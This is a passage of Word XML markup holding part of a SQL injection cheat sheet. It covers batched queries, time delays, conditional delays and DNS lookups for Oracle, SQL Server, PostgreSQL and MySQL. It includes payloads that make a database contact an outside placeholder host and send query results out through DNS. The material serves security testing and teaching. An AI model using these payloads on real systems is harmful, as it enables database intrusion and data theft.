            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>&gt; XPATH syntax error: '\secret'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A04F16F"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Batched (or stacked) queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAEF144"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use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.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5422"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="044748BE" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="446A6B2F"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419ECDBB"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Does not support batched queries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="5A539C13" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBE5147"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4940E9BC"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QUERY-1-HERE; QUERY-2-HERE</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>QUERY-1-HERE QUERY-2-HERE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="1270F288" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54976961"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lastRenderedPageBreak/>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB29E55"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QUERY-1-HERE; QUERY-2-HERE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="22EF4F9F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1215021B"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4AFE9036"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QUERY-1-HERE; QUERY-2-HERE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51CE3EBB" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
        <w:spacing w:after="150" w:line="420" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="3"/>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Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70498012" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
        <w:spacing w:after="120" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>With MySQL, batched queries typically cannot be used for SQL injection. However, this is occasionally possible if the target application uses certain PHP or Python APIs to communicate with a MySQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC32135"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Time delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDD309"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cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.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5746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="7222A1AC" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF5BF83"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C0C3C2"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dbms_pipe.receive_message(('a'),10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="385F8903" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A1262A"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0241FBA5"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WAITFOR DELAY '0:0:10'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="3FAD3579" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4418080A"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68F95134"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pg_sleep(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="50BB1D1F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E926EA"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7586D58B"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SLEEP(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35591032"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Conditional time delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF1127"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test a single boolean condition and trigger a time delay if the condition is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B8074B" w:rsidRPr="00B8074B" w14:paraId="4C613DC7" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D1C77C"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38DE8A02"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CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="155AD13D" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="498BC6F8"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125D0378"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IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="2FF1D82A" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5819BEF1"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6EBEFCB7"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CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="535340E8" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFE9B72"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219E5C9A"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IF(YOUR-CONDITION-HERE,SLEEP(10),'a')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BEDF0A1"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DNS lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32351CFE"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cause the database to perform a DNS lookup to an external domain. To do this, you will need to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B8074B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate a unique Burp </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.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B8074B" w:rsidRPr="00B8074B" w14:paraId="1E9ECEF5" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA60135"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D892C4B" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00B8074B">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="0000FF"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="27"/>
                  <w:szCs w:val="27"/>
                  <w:u w:val="single"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
                <w:t>XXE</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6274EB26"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EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6DE998" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>The following technique works on fully patched Oracle installations, but requires elevated privileges:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A74F6D"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SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="18FDB312" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7655FC"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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCD7B3D"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exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="246EFD07" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57CB8032"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3501E305"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copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="6F18152D" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50EDB096"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499C496D" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>The following techniques work on Windows only:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB9B9C3"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LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09F1470D" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DNS lookup with data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F8030" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>You can cause the database to perform a DNS lookup to an external domain containing the results of an injected query. To do this, you will need to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B8074B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B8074B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including the exfiltrated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B8074B" w:rsidRPr="00B8074B" w14:paraId="5481F226" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07256956"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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4146CF0D"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 xml:space="preserve">SELECT EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[ &lt;!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="21B3A51F" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18338023"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lastRenderedPageBreak/>
              <w:t>Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC77A83"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declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="0277A1AA" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D24C37"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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35C28511"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Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>create OR replace function f() returns void as $$</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>declare c text;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>declare p text;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>begin</w:t>
